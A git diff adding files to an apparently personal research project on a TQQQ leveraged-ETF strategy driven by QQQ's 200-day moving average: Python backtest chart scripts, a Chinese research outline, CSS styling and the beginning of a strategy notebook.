"chart_j_rolling.png") + + print("Done →", HERE) + + +if __name__ == "__main__": + main() diff --git a/docs/LRS_notebooks/research/charts/lrs_dca_strategy.py b/docs/LRS_notebooks/research/charts/lrs_dca_strategy.py new file mode 100644 index 0000000..8f9294d --- /dev/null +++ b/docs/LRS_notebooks/research/charts/lrs_dca_strategy.py @@ -0,0 +1,75 @@ +#!/usr/bin/env python3 +"""LRS DCA strategy runner (with 4% idle cash yield on LRS cash). + +Strategy: +- DCA: $2,000 on each January first trading day, up to 5 contributions +- Trading cost: $1.99 / side +- LRS idle cash yield: 4% annualized, compounded each trading day +- Windows: 2y / 3y / 5y / 10y / 15y + +Outputs: +- Metrics markdown tables for five windows +- Equity PNG charts for each window (LRS DCA vs QQQ DCA vs TQQQ DCA) +""" +from __future__ import annotations + +from pathlib import Path + +import matplotlib.pyplot as plt + +import generate_charts as core + +HERE = Path(__file__).resolve().parent + + +def run_dca_all_windows() -> list[dict]: + """Run DCA backtest for all five windows.""" + return core.run_dca_all_periods() + + +def _plot_single_window_equity(row: dict, out_path: Path) -> None: + idx = row["idx"] + fig, ax = plt.subplots(figsize=(11, 4.6)) + ax.plot(idx, row["eq_lrs_dca"].values, color="#38bdf8", lw=1.8, label="LRS DCA") + ax.plot(idx, row["eq_qqq_dca"].values, color="#a78bfa", lw=1.4, ls="--", label="QQQ DCA") + ax.plot(idx, row["eq_tqq_dca"].values, color="#fb923c", lw=1.4, ls=":", label="TQQQ DCA") + for d in row["contrib_dates"]: + ax.axvline(d, color="#64748b", alpha=0.35, lw=0.85) + ax.set_title(f"{row['label']} — DCA equity curves") + ax.set_xlabel("Date") + ax.set_ylabel("Portfolio ($)") + ax.legend(loc="upper left", fontsize=8, ncol=3) + ax.yaxis.set_major_formatter(plt.FuncFormatter(lambda x, _: f"${x:,.0f}")) + core._apply_dark(fig, ax) + fig.savefig(out_path, dpi=160, bbox_inches="tight", facecolor=core._DARK_BG) + plt.close(fig) + + +def render_dca_charts(rows: list[dict], out_dir: Path = HERE) -> dict[str, str]: + """Render DCA charts for all windows and return output file map.""" + outs: dict[str, str] = {} + for row in rows: + out = out_dir / f"dca_equity_{row['period_key']}.png" + _plot_single_window_equity(row, out) + outs[row["period_key"]] = str(out) + return outs + + +def render_dca_markdown(rows: list[dict]) -> str: + """Markdown: DCA five-window table.""" + return core.format_dca_markdown_tables(rows) + + +def main() -> None: + rows = run_dca_all_windows() + chart_paths = render_dca_charts(rows, HERE) + print(render_dca_markdown(rows)) + print("\n---") + print("Generated files:") + for k, v in chart_paths.items(): + print(f"- {k}: {v}") + + +if __name__ == "__main__": + main() + diff --git a/docs/LRS_notebooks/research/charts/lrs_lump_strategy.py b/docs/LRS_notebooks/research/charts/lrs_lump_strategy.py new file mode 100644 index 0000000..e404063 --- /dev/null +++ b/docs/LRS_notebooks/research/charts/lrs_lump_strategy.py @@ -0,0 +1,65 @@ +#!/usr/bin/env python3 +"""LRS lump-sum strategy runner (with 4% idle cash yield). + +Strategy: +- Initial capital: $10,000 (lump sum) +- Trading cost: $1.99 / side +- Idle cash yield: 4% annualized, compounded each trading day +- Windows: 2y / 3y / 5y / 10y / 15y + +Outputs: +- Metrics markdown table for five windows +- PNG charts for lump-sum strategy analysis +""" +from __future__ import annotations + +from pathlib import Path + +import generate_charts as core + +HERE = Path(__file__).resolve().parent + + +def run_lump_all_windows() -> list[dict]: + """Run lump-sum backtest for all five windows.""" + return [core.run_period(k) for k in core._PERIOD_ORDER] + + +def render_lump_charts(rows: list[dict], out_dir: Path = HERE) -> dict[str, str]: + """Render lump-sum charts and return output file map.""" + paths = { + "summary_table": str(out_dir / "lump_chart_a_summary.png"), + "returns_cagr": str(out_dir / "lump_chart_b_returns.png"), + "sharpe": str(out_dir / "lump_chart_c_sharpe.png"), + "drawdown": str(out_dir / "lump_chart_d_drawdown.png"), + "equity_5y": str(out_dir / "lump_chart_e_equity_5y.png"), + "equity_10y_15y": str(out_dir / "lump_chart_equity_10y_15y.png"), + } + core.chart_a(rows, Path(paths["summary_table"])) + core.chart_b(rows, Path(paths["returns_cagr"])) + core.chart_c(rows, Path(paths["sharpe"])) + core.chart_d(rows, Path(paths["drawdown"])) + by_key = {r["period_key"]: r for r in rows} + core.chart_e(by_key["5y"], Path(paths["equity_5y"])) + core.chart_equity_10y_15y(rows, Path(paths["equity_10y_15y"])) + return paths + + +def render_lump_markdown() -> str: + """Markdown: LRS lump-sum five-window table.""" + return core.format_lrs_lump_five_window_markdown() + + +def main() -> None: + rows = run_lump_all_windows() + chart_paths = render_lump_charts(rows, HERE) + print(render_lump_markdown()) + print("\n---") + print("Generated files:") + for k, v in chart_paths.items(): + print(f"- {k}: {v}") + + +if __name__ == "__main__": + main() + diff --git a/docs/LRS_notebooks/research/index.html b/docs/LRS_notebooks/research/index.html new file mode 100644 index 0000000..9c71a94 --- /dev/null +++ b/docs/LRS_notebooks/research/index.html @@ -0,0 +1,261 @@ + + + + + +LRS TQQQ 策略研究 + + + + + +
+ +
+
Research Paper  ·  LRS Framework v1.0
+

LRS TQQQ 策略研究

+

+ 基于 QQQ 200日均线信号,构建一套规则驱动的 TQQQ 进出场体系, + 系统规避波动损耗,捕获趋势期杠杆收益。 +

+
+ + + + + + +
+ + \ No newline at end of file diff --git a/docs/LRS_notebooks/research/lrs_10y_dashboard.png b/docs/LRS_notebooks/research/lrs_10y_dashboard.png new file mode 100644 index 0000000..f6533f4 Binary files /dev/null and b/docs/LRS_notebooks/research/lrs_10y_dashboard.png differ diff --git a/docs/LRS_notebooks/research/lrs_10y_table.png b/docs/LRS_notebooks/research/lrs_10y_table.png new file mode 100644 index 0000000..35e3500 Binary files /dev/null and b/docs/LRS_notebooks/research/lrs_10y_table.png differ diff --git a/docs/LRS_notebooks/research/research_instruction.md b/docs/LRS_notebooks/research/research_instruction.md new file mode 100644 index 0000000..3d46573 --- /dev/null +++ b/docs/LRS_notebooks/research/research_instruction.md @@ -0,0 +1,119 @@ +一、研究动机:为什么要研究这个策略? +(解决"凭什么值得认真对待"这个前置问题) + +TQQQ的收益潜力与持有风险的矛盾——为什么不能直接长期持有? +杠杆ETF的"波动损耗"机制(Volatility Decay):数学层面说明为何震荡市会侵蚀本金 +LRS策略的出现背景:试图用趋势信号解决这个矛盾 + + +你目前的大纲直接从"介绍策略"开始,缺少"为什么这个问题值得研究"的铺垫。建立这个动机,能让后续的一切论证更有说服力。 + + +二、策略机制:LRS是什么,如何运作 +(原大纲第1部分,适当扩展) + +核心规则:QQQ 200日均线信号驱动TQQQ的买入与撤出 +策略的理论假设:趋势具有延续性,均线能有效过滤噪音 +与纯TQQQ持有相比,策略试图解决什么问题 + + +三、基础回测:策略表现如何 +(原大纲第2部分,补充指标维度) +3.1 回测结果概览(近2/3/5/10年) + +总收益率、最大回撤、交易次数、胜率、假突破次数 + +3.2 补充风险调整指标 ← 你目前缺少这个维度 + +Sharpe Ratio(每单位风险的收益) +Calmar Ratio(收益/最大回撤比) +与基准的对比不只是QQQ B&H,还应包括TQQQ B&H、SPY B&H + +3.3 不同市场结构下的分类表现 + +趋势牛市 / 趋势熊市 / 震荡市 / V型急跌 各自的表现如何 + + +四、质疑与压力测试:过去的表现能否代表未来 +(原大纲第3部分,结构化拆分) +4.1 历史数据的局限性 + +当前回测覆盖哪些市场结构,遗漏了哪些 +模拟数据(2010年前)的可靠性问题 + +4.2 宏观层面的稳健性检验 + +不同牛熊周期对策略的影响(分段回测:2000-2002 / 2008-2009 / 2010-2015 / 2022) +利率环境变化对纳斯达克趋势延续性的影响 +极端黑天鹅事件(V型急跌)对均线策略的挑战 + +4.3 参数敏感性测试 ← 学术论文的标准检验,你目前没有 + +如果把200日均线换成150日或250日,结果是否大幅改变? +如果用周线信号而非日线,结果如何? +稳健的策略不应对参数高度敏感 + +4.4 滚动窗口分析 ← 比固定区间更严格的检验 + +任意选择一个10年窗口开始,结论是否一致? +避免"选择性展示最好看的时间段" + + +五、实战执行层面的微观考量 +(原大纲第3部分的微观内容,单独成章) +5.1 资金投入方式 + +一次性投入(Lump Sum)vs 分批定投(DCA)在该策略下的对比 +什么情况下DCA反而会降低策略效率? + +5.2 入场时机 + +在均线上方多远开始买入更合适? +当前市场所处阶段(牛市中期 vs 牛市末期)对策略预期的影响 + +5.3 仓位管理 + +该策略在整体资产组合中应占多大比例? +与其他资产(债券、现金、大盘ETF)如何配合? + +5.4 实际执行成本 ← 容易被忽视 + +交易摩擦成本(买卖价差、滑点) +税务影响(频繁交易产生的短期资本利得税) + + +六、策略风险清单 +(原大纲第4部分,结构化分类) + +市场结构风险:均线在震荡市中的whipsaw效应 +杠杆工具风险:TQQQ本身的结构性风险(基金清盘、跟踪误差) +执行行为风险:信号出现时能否真正按纪律执行 +尾部风险:极端事件(2020年3月级别)让均线完全失效的情景 +监管/产品风险:杠杆ETF未来可能面临的规则变化 + + +七、总结与个人决策框架 +(原大纲第5部分,加入决策落地) + +策略的核心优势与局限的综合判断 +该策略适合什么样的投资者画像(风险承受力、资金量、执行纪律) +个人如何决策:用还是不用,用多少 + + +--- + +## 站点页面与静态图表(`research/`) + +| 章节 | HTML | 说明 | +|------|------|------| +| 目录 | `index.html` | 章节目录;Ch.03 / Ch.04 含子页入口 | +| Ch.01 | `01.html` | 研究动机 | +| Ch.02 | `02.html` | 策略机制 | +| Ch.03 | `03.html` / `03b.html` / `03c.html` | 3.1 回测概览(Chart A/B)· 3.2 风险指标(C/D/E)· 3.3 结构分析(F/G) | +| Ch.04 | `04.html` / `04b.html` / `04c.html` / `04d.html` | 4.1 局限性 · 4.2 宏观(H)· 4.3 参数(I)· 4.4 滚动(J) | +| Ch.05 | `05.html` | 实战执行(四节合并) | +| Ch.06 | `06.html` | 风险清单 | +| Ch.07 | `07.html` | 总结与决策框架 | +| 样式 | `style.css` | 全局样式 | + +图表生成:`charts/generate_charts.py`(matplotlib/seaborn 输出 PNG,HTML 以相对路径 `charts/chart_*.png` 引用)。 diff --git a/docs/LRS_notebooks/research/style.css b/docs/LRS_notebooks/research/style.css new file mode 100644 index 0000000..e4ed3e5 --- /dev/null +++ b/docs/LRS_notebooks/research/style.css @@ -0,0 +1,438 @@ + +/* + * ════════════════════════════════════════════════════════════ + * LRS TQQQ 策略研究 — Design System & Typography Rules v2 + * ════════════════════════════════════════════════════════════ + * + * TYPOGRAPHY SCALE + * ┌──────────────────────────────────────────────────────────┐ + * │ 元素 │ Size │ Weight │ Color │ + * ├──────────────────────────────────────────────────────────┤ + * │ 页面主标题 │ 2.4rem │ 900 │ #0F172A │ + * │ 卡片/面板标题 (H2) │ 1.05rem │ 700 │ #1E293B │ + * │ 编号徽章 (ch-num) │ 0.58rem │ 800 │ 主题色 │ + * │ 正文 / 要点 │ 0.95rem │ 400 │ #475569 │ + * │ 重点结论 (hi) │ 0.95rem │ 700 │ #B45309 琥珀 │ + * │ 注释 / 斜体 │ 0.78rem │ 400 │ #64748B │ + * │ 数字英雄 (big-num) │ 3.4rem │ 900 │ 主题色 │ + * │ 指标卡大数字 (mc-value)│ 1.6rem │ 900 │ 主题色 │ + * └──────────────────────────────────────────────────────────┘ + * + * SEMANTIC COLORS + * 绿色 #16A34A → 正收益、盈利、策略优势、"是"分支 + * 红色 #DC2626 → 亏损、风险、"否"分支 + * 琥珀 #D97706 → 最重要结论(每卡片 ≤2 条) + * 靛蓝 #4F46E5 → 主强调(标签/数字/链接) + * 紫色 #7C3AED → 辅助强调 + * 加粗 → 章节标题、关键数字、关键结论 + * 斜体 → 注释、脚注、补充说明 + * ════════════════════════════════════════════════════════════ + */ + +/* ── Reset ─────────────────────────────────────── */ +*, *::before, *::after { margin:0; padding:0; box-sizing:border-box; } + +/* Base: at 1280px → ~19px */ +html { font-size: clamp(15px, 1.5vw, 20px); } + +body { + background: #F1F5F9; + min-height: 100vh; + font-family: 'Noto Sans SC', 'PingFang SC', 'Hiragino Sans GB', system-ui, sans-serif; + color: #1E293B; + line-height: 1.6; + display: flex; + flex-direction: column; +} + +/* ── Top Nav ───────────────────────────────────── */ +.top-nav { + height: 44px; + display: flex; + align-items: center; + padding: 0 1.6rem; + background: #FFFFFF; + border-bottom: 1.5px solid #E2E8F0; + box-shadow: 0 1px 4px rgba(0,0,0,0.05); + flex-shrink: 0; + gap: 0.8rem; + position: sticky; + top: 0; + z-index: 100; +} +.nav-brand { + font-size: 0.78rem; font-weight: 700; color: #4F46E5; + letter-spacing: 0.03em; text-decoration: none; flex-shrink: 0; +} +.nav-brand:hover { color: #3730A3; } +.nav-divider { width: 1px; height: 18px; background: #E2E8F0; flex-shrink: 0; } +.nav-chapter { + font-size: 0.76rem; font-weight: 600; color: #1E293B; + flex: 1; letter-spacing: 0.01em; +} +.nav-btn { + padding: 0.28rem 0.9rem; + background: #F8FAFC; border: 1.5px solid #E2E8F0; + color: #64748B; border-radius: 6px; cursor: pointer; + font-size: 0.72rem; font-family: inherit; font-weight: 600; + letter-spacing: 0.03em; text-decoration: none; transition: all .18s; flex-shrink: 0; +} +.nav-btn:hover { background: #EEF2FF; border-color: #A5B4FC; color: #4338CA; } +.nav-counter { + font-size: 0.68rem; color: #94A3B8; + font-family: 'Inter', sans-serif; font-weight: 600; + letter-spacing: 0.08em; flex-shrink: 0; +} + +/* ── Main canvas ────────────────────────────────── */ +main { + flex: 1; + display: flex; + flex-direction: column; + padding: 1.5% 2.2% 1.2%; + height: calc(100vh - 44px); + min-height: 0; +} + +/* ── Page Header ─────────────────────────────────── */ +.page-header { + display: flex; + align-items: center; + gap: 0.9rem; + margin-bottom: 1.2%; + padding-bottom: 1%; + border-bottom: 1.5px solid #E2E8F0; + flex-shrink: 0; +} +.page-num { + font-size: 0.64rem; font-weight: 700; letter-spacing: 0.14em; + text-transform: uppercase; color: #4F46E5; + background: #EEF2FF; border: 1px solid #C7D2FE; + padding: 0.22rem 0.65rem; border-radius: 5px; + font-family: 'Inter', sans-serif; +} +/* ① 页面主标题 */ +.page-title { + font-family: 'Inter', 'Noto Sans SC', sans-serif; + font-size: 2.4rem; font-weight: 900; color: #0F172A; + letter-spacing: -0.04em; line-height: 1; +} +.page-sub { + font-size: 0.72rem; color: #94A3B8; font-weight: 500; + text-transform: uppercase; letter-spacing: 0.08em; margin-left: auto; +} + +/* ── Grids ──────────────────────────────────────── */ +.g3 { display: grid; grid-template-columns: repeat(3,1fr); gap: 1.2%; flex: 1; min-height: 0; } +.g2 { display: grid; grid-template-columns: 1fr 1fr; gap: 1.2%; flex: 1; min-height: 0; } +.g21 { display: grid; grid-template-columns: 1.45fr 1fr; gap: 1.2%; flex: 1; min-height: 0; } + +/* ── Card / Panel ────────────────────────────────── */ +.card, .panel { + background: #FFFFFF; + border: 1.5px solid #E2E8F0; + border-radius: 12px; + overflow: hidden; + display: flex; + flex-direction: column; + box-shadow: 0 1px 4px rgba(0,0,0,0.04); + transition: border-color .2s, box-shadow .2s; + min-height: 0; +} +.card:hover, .panel:hover { + border-color: #C7D2FE; + box-shadow: 0 4px 20px rgba(99,102,241,0.10); +} + +/* Accent strip — 4px top */ +.strip { height: 4px; flex-shrink: 0; } +.strip-amber { background: linear-gradient(90deg, #D97706, #F59E0B, #D97706); } +.strip-indigo { background: linear-gradient(90deg, #4F46E5, #818CF8, #4F46E5); } +.strip-violet { background: linear-gradient(90deg, #7C3AED, #A78BFA, #7C3AED); } +.strip-green { background: linear-gradient(90deg, #059669, #34D399, #059669); } + +/* ─── Card Header ── 统一高度 & 中性底色 ────────── + 编号徽章 (ch-num) 保持主题色;标题 (ch-title) 统一深色 + 所有 label-* 变体仅影响 ch-num,不影响 header 底色 +*/ +.card-header { + display: flex; + align-items: center; + gap: 0.65rem; + padding: 0 1.05rem; + height: 2.8rem; /* 固定高度:所有卡片标题行等高 */ + background: #F8FAFC; /* 统一中性底色 */ + border-bottom: 1px solid #F1F5F9; + flex-shrink: 0; +} + +/* ③ 编号徽章 */ +.ch-num { + font-family: 'Inter', sans-serif; + font-size: 0.58rem; font-weight: 800; + letter-spacing: 0.14em; text-transform: uppercase; + flex-shrink: 0; + padding: 0.14rem 0.46rem; + border-radius: 4px; + border: 1.5px solid currentColor; + line-height: 1.6; +} +/* 各主题色 — 仅作用于 ch-num */ +.label-amber .ch-num { color: #B45309; background: #FFFBEB; } +.label-indigo .ch-num { color: #4338CA; background: #EEF2FF; } +.label-violet .ch-num { color: #6D28D9; background: #F5F3FF; } +.label-green .ch-num { color: #166534; background: #F0FDF4; } + +/* ② 卡片标题 */ +.ch-title { + font-size: 1.05rem; font-weight: 700; color: #1E293B; line-height: 1.3; +} + +/* ─── Panel Header (02/03 用) ────────────────────── */ +.panel-header { + padding: 0 1.05rem; + height: 2.8rem; /* 与 card-header 等高 */ + display: flex; + flex-direction: column; + justify-content: center; + border-bottom: 1px solid #F1F5F9; + background: #F8FAFC; + flex-shrink: 0; +} +/* 标题+编号并排行 */ +.ph-title-row { + display: flex; align-items: center; gap: 0.6rem; +} +/* panel 编号徽章 */ +.ph-num { + font-family: 'Inter', sans-serif; + font-size: 0.58rem; font-weight: 800; letter-spacing: 0.14em; text-transform: uppercase; + color: #4F46E5; background: #EEF2FF; border: 1.5px solid #C7D2FE; + padding: 0.14rem 0.46rem; border-radius: 4px; line-height: 1.6; flex-shrink: 0; +} +.panel-header h3 { font-size: 1.05rem; font-weight: 700; color: #1E293B; line-height: 1.25; } +.ph-sub { font-size: 0.64rem; color: #94A3B8; margin-top: 0.12rem; letter-spacing: 0.02em; } + +/* panel header 有副标题时需要更高 */ +.panel-header.has-sub { height: 3.6rem; } + +/* ── Card / Panel Body ───────────────────────────── */ +.card-body, .panel-body { + padding: 0.9rem 1.05rem; + flex: 1; + display: flex; + flex-direction: column; + min-height: 0; +} + +/* ⑩ 大数字 */ +.big-num { + font-family: 'Inter', sans-serif; + font-size: 3.4rem; font-weight: 900; + line-height: 1; letter-spacing: -0.05em; +} +.num-amber { color: #D97706; } +.num-green { color: #16A34A; } +.num-red { color: #DC2626; } +.num-indigo { color: #4F46E5; } + +.big-cap { + font-size: 0.82rem; color: #64748B; margin-top: 0.4rem; line-height: 1.55; +} + +.sep { height: 1px; background: #F1F5F9; margin: 0.65rem 0; flex-shrink: 0; } + +/* ─── Section mini-heading ───────────────────────── */ +.sec-h { + font-size: 0.88rem; font-weight: 700; color: #334155; + text-align: center; margin-bottom: 0.6rem; + padding: 0.3rem 0; + border-bottom: 1px dashed #E2E8F0; +} + +/* ── ④ Bullet list ───────────────────────────────── */ +ul.bl { list-style: none; flex: 1; } +ul.bl li { + font-size: 0.95rem; color: #475569; + padding: 0.28rem 0 0 1.1rem; + position: relative; line-height: 1.6; +} +ul.bl li + li { margin-top: 0.06rem; } +ul.bl li::before { + content: ''; position: absolute; left: 0; top: 0.65em; + width: 5px; height: 5px; border-radius: 50%; background: #C7D2FE; +} +/* ⑤ 重点 — 琥珀加粗 */ +ul.bl li.hi { color: #B45309; font-weight: 700; } +ul.bl li.hi::before { background: #F59E0B; } + +/* ⑥⑦ 语义色 */ +.pos { color: #16A34A; font-weight: 600; } +.neg { color: #DC2626; font-weight: 600; } +/* ⑧ 注释斜体 */ +.note { font-size: 0.78rem; font-style: italic; color: #64748B; } + +/* ── Math comparison (01.html) ───────────────────── */ +.mpair { + display: grid; grid-template-columns: 1fr auto 1fr; + align-items: center; gap: 0.5rem; margin-bottom: 0.5rem; +} +.mbox { border-radius: 9px; padding: 0.8rem 0.55rem; text-align: center; } +.mbox-g { background: #F0FDF4; border: 1.5px solid #86EFAC; } +.mbox-r { background: #FFF1F2; border: 1.5px solid #FDA4AF; } +.mbox .tk { + font-family: 'Inter', sans-serif; + font-size: 0.85rem; font-weight: 800; letter-spacing: 0.08em; margin-bottom: 0.28rem; +} +.mbox-g .tk { color: #166534; } +.mbox-r .tk { color: #9F1239; } +.mbox .eq { font-size: 0.75rem; color: #94A3B8; line-height: 1.55; } +.mbox .rs { + font-family: 'Inter', sans-serif; + font-size: 1.28rem; font-weight: 900; margin-top: 0.26rem; +} +.mbox-g .rs { color: #16A34A; } +.mbox-r .rs { color: #DC2626; } +.mvs { font-size: 0.62rem; font-weight: 700; color: #CBD5E1; text-align: center; } +.mnote { + font-size: 0.80rem; color: #B45309; text-align: center; + font-style: italic; font-weight: 600; + background: #FFFBEB; border-radius: 6px; padding: 0.3rem 0.5rem; margin-bottom: 0.5rem; +} + +/* ── Flow boxes (01.html) ────────────────────────── */ +.flow { display: flex; align-items: center; gap: 0.55rem; margin-bottom: 0.6rem; } +.fbox { + flex: 1; border-radius: 8px; padding: 0.7rem 0.55rem; + text-align: center; font-size: 0.9rem; font-weight: 600; line-height: 1.45; +} +.fp { background: #FFF1F2; border: 1px solid #FDA4AF; color: #BE123C; } +.fs { background: #F0FDF4; border: 1px solid #86EFAC; color: #15803D; } +.fa { font-size: 1.4rem; color: #6366F1; flex-shrink: 0; } + +/* ── Flowchart (02.html) ─────────────────────────── */ +.fc { display: flex; flex-direction: column; align-items: center; flex: 1; } +.fc-node { + width: 90%; border-radius: 9px; text-align: center; + font-size: 0.9rem; font-weight: 600; padding: 0.65rem 0.9rem; +} +.fc-start { background: #F8F8FF; border: 1.5px solid #C7D2FE; color: #3730A3; } +.fc-dec { background: #F8F8FF; border: 2px solid #6366F1; color: #1E1B4B; font-size: 0.9rem; padding: 0.72rem 0.9rem; } +.fc-dec .hl { color: #16A34A; font-weight: 900; } +.fc-arr { color: #CBD5E1; font-size: 0.88rem; padding: 0.22rem 0; } +.fc-split { display: grid; grid-template-columns: 1fr 1fr; gap: 5%; width: 100%; margin-top: 0.36rem; } +.fc-side { display: flex; flex-direction: column; align-items: center; gap: 0.26rem; } +.fc-lbl { font-size: 0.76rem; font-weight: 700; } +.fc-lbl.y { color: #16A34A; } +.fc-lbl.n { color: #DC2626; } +.fc-out { + width: 100%; border-radius: 9px; text-align: center; + font-size: 0.85rem; padding: 0.65rem 0.45rem; +} +.fc-out .fmain { font-weight: 700; font-size: 0.9rem; } +.fc-out .fsub { font-size: 0.78em; margin-top: 0.28rem; opacity: 0.88; } +.fc-buy { background: #F0FDF4; border: 1.5px solid #86EFAC; color: #166534; } +.fc-sell { background: #FFF1F2; border: 1.5px solid #FDA4AF; color: #9F1239; } +.fc-foot { margin-top: 0.5rem; font-size: 0.68rem; color: #94A3B8; text-align: center; line-height: 1.6; } + +/* ── Right stacked panels ────────────────────────── */ +.rstack { display: flex; flex-direction: column; gap: 1.2%; } +.rstack .panel { flex: 1; } + +/* ── Assumption rows (02.html) ───────────────────── */ +.ar { display: flex; align-items: flex-start; gap: 0.75rem; padding: 0.58rem 0; border-bottom: 1px solid #F8FAFC; } +.ar:last-child { border-bottom: none; } +.badge { + width: 1.55rem; height: 1.55rem; border-radius: 50%; flex-shrink: 0; + background: #EEF2FF; border: 1px solid #C7D2FE; + display: flex; align-items: center; justify-content: center; + font-size: 0.65rem; font-weight: 700; color: #4338CA; + font-family: 'Inter', sans-serif; +} +.al { font-size: 0.95rem; font-weight: 700; color: #1E293B; line-height: 1.3; } +.ad { font-size: 0.82rem; color: #64748B; margin-top: 0.18rem; line-height: 1.5; } + +/* ── Comparison table (02.html) ──────────────────── */ +.cmp-tbl { + width: 100%; border-collapse: separate; border-spacing: 0; + border-radius: 9px; overflow: hidden; border: 1px solid #E2E8F0; +} +.cmp-tbl th { padding: 0.62rem; font-size: 0.82rem; font-weight: 700; text-align: center; } +.cmp-tbl th.rh { background: #FFF1F2; border-right: 1px solid #E2E8F0; color: #BE123C; } +.cmp-tbl th.gh { background: #F0FDF4; color: #166534; } +.cmp-tbl td { + padding: 0.56rem 0.68rem; font-size: 0.88rem; + text-align: center; border-top: 1px solid #F1F5F9; +} +.cmp-tbl tr:nth-child(odd) td { background: #FAFAFA; } +.cmp-tbl tr:nth-child(even) td { background: #FFFFFF; } +.cmp-tbl td.rc { color: #DC2626; font-weight: 500; } +.cmp-tbl td.gc { color: #16A34A; font-weight: 500; } + +/* ── Metric card (03.html) ───────────────────────── */ +.metric-card { + background: #FFFFFF; border: 1.5px solid #E2E8F0; border-radius: 11px; + padding: 0.72rem 1rem 0.8rem; + display: flex; flex-direction: column; +} +/* 标签在上 */ +.mc-label { + font-size: 0.62rem; font-weight: 700; + letter-spacing: 0.09em; text-transform: uppercase; color: #94A3B8; + margin-bottom: 0.3rem; +} +/* 数字居中对齐,Inter 字体 */ +.mc-value { + font-family: 'Inter', sans-serif; + font-size: 1.65rem; font-weight: 900; + letter-spacing: -0.03em; line-height: 1; + margin-bottom: 0.28rem; +} +.mc-sub { font-size: 0.7rem; color: #94A3B8; } + +/* 强调型指标卡 (带背景) */ +.metric-card.accent-indigo { background: #F5F3FF; border-color: #C7D2FE; } +.metric-card.accent-red { background: #FFF1F2; border-color: #FECDD3; } + +.c-green { color: #16A34A; } +.c-red { color: #DC2626; } +.c-indigo { color: #4F46E5; } +.c-amber { color: #D97706; } + +/* ── Bar comparison (03.html) ────────────────────── */ +.vs-bar { display: flex; flex-direction: column; gap: 0.82rem; } +.vs-label-row { + display: flex; justify-content: space-between; + font-size: 0.76rem; font-weight: 600; margin-bottom: 0.24rem; +} +.vs-track { height: 10px; background: #F1F5F9; border-radius: 5px; overflow: hidden; } +.vs-fill { height: 100%; border-radius: 5px; } +.vs-fill-lrs { background: linear-gradient(90deg, #6366F1, #818CF8); } +.vs-fill-qqq { background: linear-gradient(90deg, #A78BFA, #C4B5FD); } + +/* ── Backtest trade table (03.html) ──────────────── */ +.bt-tbl { + width: 100%; border-collapse: separate; border-spacing: 0; + font-size: 0.88rem; border-radius: 9px; overflow: hidden; border: 1px solid #E2E8F0; +} +.bt-tbl thead th { + padding: 0.58rem 0.7rem; background: #F8FAFC; font-weight: 700; + font-size: 0.7rem; text-transform: uppercase; letter-spacing: 0.06em; + color: #64748B; border-bottom: 1px solid #E2E8F0; text-align: center; white-space: nowrap; +} +.bt-tbl tbody td { + padding: 0.46rem 0.7rem; border-bottom: 1px solid #F1F5F9; text-align: center; color: #374151; +} +.bt-tbl tbody tr:hover td { background: #F8FAFF; } +.bt-tbl .win { color: #16A34A; font-weight: 700; } +.bt-tbl .loss { color: #DC2626; font-weight: 700; } + +/* ── Chart image embed (03.html) ─────────────────── */ +.chart-img-wrap { + flex: 1; min-height: 0; overflow: hidden; border-radius: 10px; + background: #0f172a; + display: flex; align-items: center; justify-content: center; +} +.chart-img-wrap img { + width: 100%; height: 100%; object-fit: contain; +} diff --git a/docs/lrs_tqqq_research.ipynb b/docs/lrs_tqqq_research.ipynb new file mode 100644 index 0000000..ee0ed14 --- /dev/null +++ b/docs/lrs_tqqq_research.ipynb @@ -0,0 +1,545 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "id": "6dfb2220", + "metadata": {}, + "source": [ + "# LRS TQQQ 策略研究 Notebook\n", + "\n", + "> 目标:把「QQQ 200 日均线信号」从单一规则升级为可交易、可验证、可迭代的策略框架。\n", + "\n", + "## 研究边界\n", + "\n", + "- 标的:`TQQQ`(执行层)\n", + "- 主信号:`QQQ` 的 200 日均线(方向层)\n", + "- 宏观过滤:沿用当前项目的 6 个 Yahoo 代理指标\n", + "- 研究周期建议:最近 2 年为主,外加若干震荡窗口专项复盘\n", + "\n", + "## 你当前关注的问题(转为研究问题)\n", + "\n", + "1. 200MA 信号出现后,如何判定是否“有效信号”?\n", + "2. 宏观信号如何先行过滤,避免逆风硬上仓位?\n", + "3. 执行方式如何选:直接买入 TQQQ 还是卖 Put 接盘?\n", + "4. 仓位配比怎么定:一次满仓还是分层进场?\n", + "5. 横盘震荡阶段如何减少反复打脸?\n", + "6. 回测窗口多长合适(2 年 vs 5 年)?重点复盘哪些区间?\n" + ] + }, + { + "cell_type": "markdown", + "id": "cd26f066", + "metadata": {}, + "source": [ + "## 一、策略基本框架(V0.1)\n", + "\n", + "将策略拆成 4 层:\n", + "\n", + "1. **方向层(Direction)**:QQQ vs 200MA\n", + "2. **有效性层(Validation)**:信号是否可靠(避免假突破)\n", + "3. **执行层(Execution)**:直接买 TQQQ 或卖 Put 接盘\n", + "4. **风控层(Risk)**:仓位、止损、横盘降频\n", + "\n", + "---\n", + "\n", + "### 1) 方向层:基础信号\n", + "\n", + "- 多头候选:`QQQ close > MA200`\n", + "- 空仓候选:`QQQ close < MA200`\n", + "\n", + "这个层只给“方向”,不直接给“仓位大小/执行方式”。\n", + "\n", + "### 2) 有效性层:通过后才进场\n", + "\n", + "建议至少同时满足以下 3 条中的 2 条:\n", + "\n", + "- **趋势确认**:QQQ 连续 N 日站上 MA200(建议 N=3~5)\n", + "- **斜率确认**:MA200 斜率为正(例如过去 20 日 MA200 变化 > 0)\n", + "- **波动确认**:短期波动率不过高(避免消息驱动尖刺后的回落)\n", + "\n", + "### 3) 宏观过滤层(先行)\n", + "\n", + "把 6 个宏观代理映射成 Risk-On / Risk-Off 分数:\n", + "\n", + "- 美债收益率曲线(^IRX, ^FVX, ^TNX, ^TYX)\n", + "- 美元指数(DX-Y.NYB)\n", + "- 通胀预期代理(TIP)\n", + "\n", + "建议先做一个简单规则:\n", + "\n", + "- `macro_score >= +1`:允许做多\n", + "- `macro_score <= -1`:禁止新增多头,偏减仓/观望\n", + "- 介于中间:仅小仓位试错\n", + "\n", + "### 4) 执行层(买入方式决策)\n", + "\n", + "当方向+有效性+宏观全部通过后,再决定执行方式:\n", + "\n", + "- 若价格离短均线不远、波动适中:**直接买 TQQQ**\n", + "- 若价格偏离较大(追高风险)或短期波动上升:**卖 Put 等接盘**\n", + "\n", + "可先做离散选择器:\n", + "\n", + "- `execution_mode = \"direct_buy\" | \"sell_put\"`\n", + "\n", + "### 5) 风控层(仓位与震荡)\n", + "\n", + "- 基础仓位分层:`25% -> 50% -> 75% -> 